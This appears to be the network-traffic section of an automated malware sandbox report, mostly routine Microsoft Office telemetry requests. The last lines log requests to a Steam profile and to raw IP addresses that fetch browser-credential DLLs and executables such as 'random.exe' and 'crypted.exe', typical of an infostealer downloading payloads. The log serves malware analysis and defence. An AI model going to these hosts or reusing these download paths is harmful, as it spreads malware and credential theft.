                    Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /img/pidgeon.exe HTTP/1.1Host: 87.120.125.254
                    Source: global trafficHTTP traffic detected: GET /files/crypted.exe HTTP/1.1Host: 31.41.244.11
                    Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 11 Nov 2024 15:34:09 GMTIf-None-Match: "673223f1-1b8200"
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
